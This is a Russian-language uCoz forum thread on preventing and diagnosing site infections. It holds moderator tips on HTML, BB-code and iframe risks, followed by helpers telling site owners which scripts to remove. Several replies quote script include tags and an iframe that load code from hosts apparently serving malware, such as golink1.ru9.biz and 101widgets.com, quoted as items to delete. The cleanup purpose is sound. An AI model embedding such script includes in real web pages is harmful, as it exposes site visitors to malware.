Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04 21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте

  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    bandjuk
    Сообщений: 6816
    Репутация: 2398
    Уровень замечаний:

    Сообщение # 331 | 21:42:41 21 Июл 2013
    Valusik, в ПУ-хе через быструю замену удалить скрипт:
    <script language="javascript" src="http://golink1.ru9.biz/js/back.php?id=43"></script>
    и этот:
    <script language="javascript" src="http://golink2.ru9.biz/js/back.php?id=43"></script>

    и сменить все пароли, ПУ, секретное слово...
    Anna33
    Сообщений: 19
    Репутация: 0

    Сообщение # 332 | 11:43:41 22 Июл 2013
    Здравствуйте. Я только начинаю создавать сайт. (http://sobstvennikova.ucoz.ru) В последние дни появляется предупреждение avast на всех страницах. Можно ли как-то помочь.Объясните, пожалуйста, попроще, я полный дилетант в этом деле.
    Детали заражения:URL:http://182.fox.pp.ua/?963896Процесс:C:\Program Files\Mozilla Firefox\firefox...Инфекция:URL:Mal
    bandjuk
    Сообщений: 6816
    Репутация: 2398
    Уровень замечаний:

    Сообщение # 333 | 11:50:06 22 Июл 2013
    Anna33, на главной странице, там где идёт приветствие, в коде есть скрипт виджета, его нужно удалить:
    <script language="JavaScript" src="http://101widgets.com/01114007/1/1"></script>
    скрипт часов в правом блоке тоже:
    <script language="JavaScript" src="http://101widgets.com/10030001/150/150"></script>
    скрипт календаря тоже:
    <script language="JavaScript" src="http://101widgets.com/00004212/200/187"></script>

    и не стоит больше ставить виджеты с этого сайта
    Anna33
    Сообщений: 19
    Репутация: 0

    Сообщение # 334 | 11:59:48 22 Июл 2013
    bandjuk,всё нашла! Огромное спасибо за помощь!
    Valusik
    Сообщений: 9
    Репутация: 0

    Сообщение # 335 | 16:44:21 22 Июл 2013
    Цитата (bandjuk)
    в ПУ-хе через быструю замену удалить скрипт:... и этот:...
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 336 | 16:54:14 22 Июл 2013
    Valusik, если что-то не понятно, то мы пишем буквами что именно не понятно, а не просто цитируем в надежде, что кто-то догадается к чему это

    посмотрите на этот код. что именно ставили вы?

    Код
    <a href="http://www.clixsense.com/?4028946" target=_blank><img src="http://csstatic.com/banners/clixsense_gpt468x60a.png" border=0></a>
    Код
    <a href="http://www.wmmail.ru/index.php?ref=valusik"><img src="http://www.wmmail.ru/banners/843wmmail468.gif" alt="WMmail.ru - сервис почтовых рассылок" border=0></a>

    Код
    <a href="http://www.seosprint.net/?ref=1603958" target="_blank"><img src="http://www.seosprint.net/baners/seo5x468x60.gif" width="468" height="60" border="0" alt="SEO sprint - Всё для максимальной раскрутки!" /></a>


    далее панель управления - дизайн - управление дизайном - быстрая замена - в поле что заменить вставляете скрипт

    Код
    <script language="javascript" src="http://golink1.ru9.biz/js/back.php?id=43"></script>


    поле на что заменить оставить пустым и произвести замену во всех модулях

    после очистки нужно изменить пароль uID профиля, которым администрируете сайт. инструкция по замене тут //forum.ucoz.ru/forum/45-52299-1
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Баш
    Сообщений: 244
    Репутация: 28

    Сообщение # 337 | 01:36:27 23 Июл 2013
    Здравствуйте, на днях Яндекс объявил мне что у меня на сайте есть Вредоносный код, и даже дал страничку на которой он располагается. В общем три дня я мудохаюсь и не пойму где там Яндекс умудрился его найти.
    Подскажите какую нибудь проверенную и безопасную программу для выявления вредоносных кодов на сайте.
    В инэте наткнулся на программу Siteverify, но не рискую ею воспользоваться. Может кто уже пользовался ею? Безопасно ли это? http://comicsindustry.ru/
    Сообщение отредактировал webanet - Вторник, 23 Июл 2013, 15:38:14
    Alex1991677
    Сообщений: 11
    Репутация: 0

    Сообщение # 338 | 14:40:55 23 Июл 2013
    Здравствуйте webanet,!!! Посетители моего сайта http://8905-597-07-06.ru/ жалуются на то, что когда заходят на сайт, то Касперский выдает предупреждение сразу "URL-адрес http://static.adv-first.ru/uploads/banner_1331.swf, содержащий вредоносную программу, обнаружен" Проверил ни чего подозрительного не нашел.... Посмотрите пожалуйста сайт может я что то не увидел. Спасибо.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 339 | 15:01:39 23 Июл 2013
    Alex1991677, спросите у пользователей, когда касперский выдает такие алерты, стандартный рекламный баннер блокируется? и включен ли у них антибаннер касперского
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Alex1991677
    Сообщений: 11
    Репутация: 0

    Сообщение # 340 | 15:20:35 23 Июл 2013
    Цитата (webanet)
    спросите у пользователей, когда касперский выдает такие алерты, стандартный рекламный баннер блокируется? и включен ли у них антибаннер касперского
    webanet    , как только с поисковика на главную страницу входят, они мне сказали что сам банер виден, вернее его рамки, но что в нем пишется все заблокировано, по настройкам касперского на "антибанер" включен или выключен выяснить не удалось ((((((
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 341 | 15:31:00 23 Июл 2013
    Alex1991677, спасибо. этого достаточно. идет реакция на открутку в рекламе
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 342 | 15:47:37 23 Июл 2013
    Баш, вот из-за этого дела вас блочит яндекс

    Код
    <iframe src="http://comicsindustry.ru/Banners/admitad/avtobanner.html" frameborder="no" scrolling="no" width="715" height="90"></iframe>
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Баш
    Сообщений: 244
    Репутация: 28

    Сообщение # 343 | 15:52:17 23 Июл 2013
    Из за партнерки Admitad? surprised
    Она же вроде высокого уровня.
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 344 | 15:53:39 23 Июл 2013
    Баш, я сказала из-за чего блочит. а вы оставляйте если хотите.

    ещё обязательно удалить этот скрипт с рекламой

    Код
    <script type="text/javascript" src="http://comicsindustry.ru/scripts/1ip24hours/Reklama.js"></script>
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    Баш
    Сообщений: 244
    Репутация: 28

    Сообщение # 345 | 16:09:20 23 Июл 2013
    webanet, Эти все скрипты проверены http://antivirus-alarm.ru/proverka/?url=comicsindustry.ru
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск: